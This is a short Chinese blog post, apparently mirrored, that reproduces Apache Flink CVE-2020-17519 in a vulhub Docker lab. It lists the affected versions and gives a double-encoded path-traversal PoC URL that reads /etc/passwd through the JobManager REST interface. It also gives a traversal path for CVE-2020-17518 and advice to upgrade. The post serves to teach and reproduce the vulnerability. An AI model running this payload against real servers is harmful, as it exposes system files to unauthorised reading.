zoukankan      html  css  js  c++  java
  • Apache Flink CVE-2020-17519漏洞复现

    Apache Flink 

    Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。

    Apache Flink 1.11.0中引入的一项更改(包括版本1.11.1和1.11.2)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。

     

    影响版本:

    1.11.0
    1.11.1
    1.11.2


    环境搭建:
    直接下载整个vulhub即可

     

     开启docker

    docker-compose up -d 

    Apache Flink界面

     poc

    /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

     

     CVE-2020-17518

    ../../../../../../tmp/success

     

    漏洞修补

    所有用户升级到Flink 1.11.3或1.12.0,下载链接为:

    https://flink.apache.org/downloads.htmlhttps://flink.apache.org/downloads.html
     
    苟利国家生死以,岂因福祸避趋之
  • 相关阅读:
    JS判断单选框是否选中
    Js判断是否有属性
    判断是否有焦点
    Js 替代
    Js解析json
    回车事件
    js解析XML
    Linux常用基础(三)
    Linux常用基础(二)
    Linux常用基础(一)
  • 原文地址:https://www.cnblogs.com/lyh1/p/14265015.html
Copyright © 2011-2022 走看看